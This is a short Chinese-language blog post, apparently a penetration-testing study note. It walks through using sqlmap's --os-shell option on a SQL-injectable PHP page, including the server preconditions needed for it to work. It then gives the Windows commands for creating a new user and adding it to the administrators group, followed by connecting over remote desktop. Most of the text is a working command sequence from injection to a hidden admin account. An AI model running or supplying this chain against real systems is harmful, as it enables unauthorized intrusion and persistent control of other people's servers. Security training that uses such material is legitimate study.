Kali渗透学习(2)——sqlmap使用--os-shell添加管理员

Kali渗透学习(2)——sqlmap使用–os-shell添加管理员

首先要使用 --os-shell 来添加管理员用户,数据库要满足以下条件

1.你使用的数据库要有root权限

sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --is-dbs

2GPC处于关闭状态即magic_quotes_gpc = off,php主动转义的功能关闭

可以通过探针,或者测试特殊字符来确定是否关闭

3.secure_file_priv为空

使用sqlmap --os-shell

sqlmap -u “http://xxxx.xxx.xxx/xxx.php?id=x” --os-shell

返回**os-shell>**表示成功了,这里列出了常用提权dos命令

列出用户 net user
添加用户 net user username password /add 注意密码至少包含一个符号
添加至管理员组 net localgroup administrators username

使用远程桌面链接

rdesktop ip:port

你可能感兴趣的:(渗透测试)